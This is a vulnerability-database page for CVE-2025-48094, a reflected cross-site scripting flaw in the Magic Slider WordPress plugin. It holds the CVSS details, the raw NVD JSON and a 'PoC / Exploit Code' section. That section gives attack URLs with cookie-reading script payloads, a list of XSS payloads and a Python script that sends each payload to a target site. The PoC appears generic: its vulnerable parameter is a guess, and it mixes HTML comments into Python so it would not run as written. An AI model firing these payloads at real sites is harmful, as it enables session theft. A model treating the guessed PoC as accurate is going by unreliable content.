Security Vulnerability Report
中文
CVE-2025-48094 CVSS 7.1 HIGH

CVE-2025-48094

Published: 2026-01-22 17:15:55
Last Modified: 2026-04-27 20:16:07

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup Magic Slider magic_slider allows Reflected XSS.This issue affects Magic Slider: from n/a through <= 2.2.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Magic Slider <= 2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-48094 PoC: Reflected XSS in WordPress Magic Slider Plugin --> <!-- Target: Magic Slider <= 2.2 --> <!-- Payload: Reflected in page without sanitization --> <!-- PoC URL (modify target domain) --> <!-- https://target-site.com/?page_id=<slider_page_id>&id=<script>alert(document.cookie)</script> --> <!-- Example with event handler payload --> <!-- https://target-site.com/?page_id=123&id=456" onerror="alert('XSS') --> <!-- Automated PoC Test --> import requests target = "http://target-site.com" page_id = "123" # Change to actual slider page ID # XSS payloads payloads = [ "<script>alert(document.domain)</script>", "<img src=x onerror=alert(document.cookie)>", "<svg onload=alert('XSS')>", "javascript:alert(document.cookie)" ] for payload in payloads: params = { 'page_id': page_id, 'id': payload } response = requests.get(target, params=params) if payload in response.text: print(f"[+] Vulnerable! Payload reflected: {payload}") else: print(f"[-] Not vulnerable or payload not found")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-48094", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:15:55.150", "lastModified": "2026-04-27T20:16:07.360", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup Magic Slider magic_slider allows Reflected XSS.This issue affects Magic Slider: from n/a through <= 2.2."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') vulnerabilidad en LambertGroup Magic Slider magic_slider permite XSS Reflejado. Este problema afecta a Magic Slider: desde n/a hasta &lt;= 2.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/magic_slider/vulnerability/wordpress-magic-slider-plugin-2-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}